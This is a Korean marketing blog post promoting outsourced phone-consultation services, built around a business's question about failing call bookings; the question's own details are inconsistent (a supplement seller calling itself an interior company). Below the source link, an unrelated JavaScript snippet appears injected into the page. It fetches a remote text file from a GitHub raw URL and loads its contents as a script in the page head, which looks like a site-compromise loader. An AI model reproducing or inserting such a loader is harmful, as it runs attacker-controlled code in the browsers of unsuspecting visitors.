전화 예약 성공률이 계속 떨어진다면?

콜 상담은 영업입니다. 경험과 노하우를 지닌 전문가여야 합니다.
위픽코퍼레이션
2022-07-06

안녕하세요 저희는 다이어트 건강기능식품을 판매하는 기업입니다. 
저희가 인테리어 업체다 보니 보통 상담예약 후 전화로 구매를 이끌어내는데요. 

고객 DB까지는 잘 모이는데 전화 예약에서 매번 실패하게 됩니다. 

아직 저희가 콜팀을 따로 꾸릴 수 있는 여건이 안되어서 저희 직원이 콜영업도 같이 병행하고 있는데요. 

아무래도 이쪽이 전문 직종이 아니다 보니 구매까지 이어지기가 어려운 것 같아요.


상주 인력으로 콜 담당자를 뽑기는 부담되는데 콜상담 예약율을 높일 수 있는 방법이 있을까요?


안녕하세요. 질문주신 내용으로 보아 콜 담당하시는 분이 전문 콜 상담 직원이 아닌 것으로 보여 집니다. 

보통은 전문 콜 상담 직원 채용에 부담도 있으시고 번거롭게 느끼셔서 상대적으로 덜 바쁜 내부 직원에게 맡기시는 케이스를 많이 보았는데요. 

하지만 콜 상담은 영업만큼 힘든 업무이기에 좀 더 세밀하고 전략적인 접근이 필요합니다.

효과적인 콜 상담 방법에 대해 조금이나마 답변을 드려보겠습니다.

◆ 효과적인 콜 상담의 방법은?

콜 상담에 있어서는 스크립트가 상당히 중요합니다. 

즉 콜 상담의 매뉴얼이라고 생각하시면 됩니다. 

콜 스크립트는 (도입 → case파악 → 상품/프로그램 설명 → 반대극복 → 클로징 → 다지기 멘트)의 순서를 철저히 지키며 전략적으로 잘 짜여야 합니다.

하지만 영업 및 화법의 지식이 없으신 분들은 스크립트 작성이 쉽지는 않을 뿐더러, 

콜 상담이 진행되는 동안 군중심리 자극, 택일 화법 등 전략적인 말하는 기술도 상당히 중요합니다.

하지만 이 또한 교육을 진행할 여건도 안 된다는 것이 문제이죠.

따라서 위와 같은 고충을 겪고 있는 기업이라면 이런 부분을 해결할 수 있는 콜 대행을 고려해보는 것이 좋습니다.

◆ 콜 대행이란?

콜대행은 보통 10년 이상 경력의 콜 상담 베테랑들이 제품 및 상품에 대해 철저한 스터디를 완료하고 예약 및 판매까지 콜 상담을 대행하는 상품을 말합니다.

◆ 콜 대행 과금 방식은?

보통 과금 방식은 인건비 기반의 기간제 상품 또는 통화 연결 시도에 따라 과금하는 방식을 가지고 있습니다. 

그러나 이러한 과금 방식은 높은 전화 연결 성공율과 예약 성공율을 보장할 수 없는 단점이 있습니다.


따라서 이러한 단점을 보완한 통화 연결시에만 과금 하는 과금하는 CPR (Cost Per Receve a call) 상품도 있습니다. 

◆ 콜 대행 운영 시간은?

대부분 콜 대행 운영시간은 일반 영업시간과 동일한 9 to 6가 많습니다.

하지만 심야 ~ 새벽 시간대에도 CS 응대가 필요한 업장들도 많죠.

특히 주고객층이 20 ~ 40 직장인이라면 심야 시간대는 반드시 잡아야할 주요 시간대일 것입니다.

하여 이러한 점을 보완한 새벽 상담 콜 대행도 진행하는 대행사들도 있습니다.


콜 상담은 업무 특성상 이직률이 높은 직군이며, 그로 인해 내부에서 콜 상담 조직을 운영 하는 것에 어려움이 있을텐데요.

따라서 내부적으로 콜 대행 비용과 상주 인력 채용 비용을 비교 해보시고 비용 차이가 크지 않다면 콜 대행으로 진행하는 것을 추천드립니다.

결론적으로 효용성, 비용, 조직 관리 등 여러 측면으로 보았을 때 콜 대행으로 진행하시는 게 더 효과적일 수 있습니다. 

콜 대행 상품 자세히 알아보기

[출처 : https://wepick.kr/letters/4305326/]

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)
위픽코퍼레이션의 글 더보기
Elementor #4352262
? 디자인 맛집으로 소문난 이 곳!
애니메이션에 녹아 든 '아시아나 항공'의 맥주 마케팅
무아인, 버추얼 인플루언서의 등장?
'대한민국'을 응원하는 '박카스'의 한마디
세상에서 가장 조용한 CM송, 해태 부라보콘 광고 털기?
세일즈 더보기
실장님들께 어깨너머로 배운 전화영업 성공률을 높이는 방법
B2B 세일즈를 위한 기본개념 이해
고객의 입장에서 공감하면 해결책이 보입니다.
아웃 콜 상담은 영업입니다.

4335184 인기 이벤트

댓글

링크복사

페이스북

카카오톡